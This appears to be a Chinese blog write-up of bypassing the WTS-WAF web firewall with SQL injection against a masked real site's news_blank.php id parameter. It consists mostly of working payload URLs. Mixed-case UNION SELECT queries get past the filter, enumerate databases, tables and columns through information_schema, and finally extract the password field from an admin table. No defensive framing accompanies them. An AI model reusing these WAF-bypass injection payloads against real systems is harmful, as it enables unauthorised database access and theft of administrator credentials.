记一次过WTS-WAF注入

http://xxx.com/news_blank.php?id=296 and 1=1

记一次过WTS-WAF注入

http://xxxxx.com/news_blank.php?id=296+and+1=1

记一次过WTS-WAF注入
http://xxxxx.com/news_blank.php?id=296+and+1=2
记一次过WTS-WAF注入

确认是注入

记一次过WTS-WAF注入
http://xxxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,4,5,6,7,8,9,10,11–+
记一次过WTS-WAF注入
http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,user(),5,6,7,version(),9,10,11–+
记一次过WTS-WAF注入
http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(schema_name as char))),5,6,7,version(),9,10,11 from information_schema.schemata limit 1,2
记一次过WTS-WAF注入
http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(table_name as char))),5,6,7,version(),9,10,11 from information_schema.tables where table_schema=’hengdong’limit 0,1 查询表名

记一次过WTS-WAF注入

由于表名太多 所以用python写了个脚本

记一次过WTS-WAF注入
http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(column_name as char))),5,6,7,version(),9,10,11 from information_schema.columns where table_schema=’hengdong’and table_name=’hdwl_admin’limit 3,4 查询字段名



http://xxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(pwdas char))),5,6,7,version(),9,10,11 from hdwl_admin 查询字段的内容

记一次过WTS-WAF注入
© 版权声明
THE END
喜欢就支持一下吧
点赞13 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容